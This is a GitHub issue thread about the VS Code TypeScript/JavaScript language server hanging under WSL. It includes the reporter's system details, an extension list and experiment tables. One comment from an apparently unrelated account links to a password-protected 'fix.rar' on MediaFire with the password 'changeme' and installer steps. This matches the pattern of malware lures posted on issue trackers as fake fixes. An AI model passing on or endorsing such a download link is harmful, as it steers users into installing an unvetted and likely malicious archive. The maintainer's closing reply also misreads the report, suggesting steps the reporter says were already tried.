### ISSUE TITLE
El servidor de lenguaje de ts js no inicia

### ISSUE THREAD

**Issue by AlexelOso33** [microsoft/vscode#226640]
Type: <b>Bug</b>

Al iniciar la ventana (o recargar), el servidor de lenguaje queda cargando. Deshabilité las extensiones VSCODE INTELLICODE y VUE VOLAR pero continúa igual.

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.22631
Modes:
Remote OS version: Linux x64 5.15.153.1-microsoft-standard-WSL2
Remote OS version: Linux x64 5.15.153.1-microsoft-standard-WSL2
Remote OS version: Linux x64 5.15.153.1-microsoft-standard-WSL2

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|AMD Ryzen 5 5600H with Radeon Graphics          (12 x 3294)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|7.40GB (0.47GB free)|
|Process Argv|--crash-reporter-id daa3e6ae-ed95-40c5-adaf-58c872948ce2|
|Screen Reader|no|
|VM|0%|

|Item|Value|
|---|---|
|Remote|WSL: Ubuntu-22.04|
|OS|Linux x64 5.15.153.1-microsoft-standard-WSL2|
|CPUs|AMD Ryzen 5 5600H with Radeon Graphics (12 x 0)|
|Memory (System)|3.59GB (0.32GB free)|
|VM|0%|

|Item|Value|
|---|---|
|Remote|WSL: Ubuntu-22.04|
|OS|Linux x64 5.15.153.1-microsoft-standard-WSL2|
|CPUs|AMD Ryzen 5 5600H with Radeon Graphics (12 x 0)|
|Memory (System)|3.59GB (0.32GB free)|
|VM|0%|

|Item|Value|
|---|---|
|Remote|WSL: Ubuntu-22.04|
|OS|Linux x64 5.15.153.1-microsoft-standard-WSL2|
|CPUs|AMD Ryzen 5 5600H with Radeon Graphics (12 x 0)|
|Memory (System)|3.59GB (0.32GB free)|
|VM|0%|
</details><details><summary>Extensions (39)</summary>

Extension|Author (truncated)|Version
---|---|---
es7-react-js-snippets|dsz|4.4.3
font-switcher|eva|4.1.0
gruvbox-ish|Gra|0.5.18
activitusbar|Gru|0.0.47
css-snippets|joy|1.0.4
vsc-python-indent|Kev|1.18.0
vscode-edge-devtools|ms-|2.1.5
jupyter-keymap|ms-|1.1.2
remote-containers|ms-|0.382.0
remote-ssh|ms-|0.113.1
remote-ssh-edit|ms-|0.86.0
remote-wsl|ms-|0.88.2
vscode-remote-extensionpack|ms-|0.25.0
onedrive-browser|ms-|0.0.1
remote-explorer|ms-|0.4.3
vscode-speech|ms-|0.10.0
material-icon-theme|PKi|5.9.0
es7-react-js-snippets|rod|1.9.3
svg-preview|Sim|2.8.3
bootstrap4-vscode|the|6.1.0
pdf|tom|1.2.2
vscode-intelephense-client|bme|1.12.4
mdoc|bxa|1.4.0
npm-intellisense|chr|1.4.5
bracket-pair-toggler|dzh|0.0.3
vscode-html-css|ecm|2.0.10
prettier-vscode|esb|11.0.0
copilot|Git|1.223.1066
copilot-chat|Git|0.19.2024073102
ftp-simple|hum|0.7.6
vscode-language-pack-es|MS-|1.92.2024081409
debugpy|ms-|2024.10.0
python|ms-|2024.12.3
vscode-pylance|ms-|2024.8.1
vscode-react-native|msj|1.13.0
vscode-yaml|red|1.15.0
image-viewer|vsc|1.6.5
php-debug|xde|1.35.0
php-pack|xde|1.0.3

(2 theme extensions excluded)

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368cf:30146710
vspor879:30202332
vspor708:30202333
vspor363:30204092
vswsl492:30256859
vscod805cf:30301675
binariesv615:30325510
vsaa593cf:30376535
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyonecf:30548226
962ge761:30959799
pythongtdpath:30769146
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
2e7ec940:31000449
pythontbext0:30879054
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
f3je6385:31013174
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupytercf:31046870
newcmakeconfigv2:31071590
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flighttreat:31119336
wkspc-onlycs-t:31111718
fje88620:31121564

```

</details>

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mjbvz** [comment]
Please file issues in English. The text suggests you should try disabling these extensions though:

> Deshabilité las extensiones VSCODE INTELLICODE y VUE VOLAR pero continúa igual.
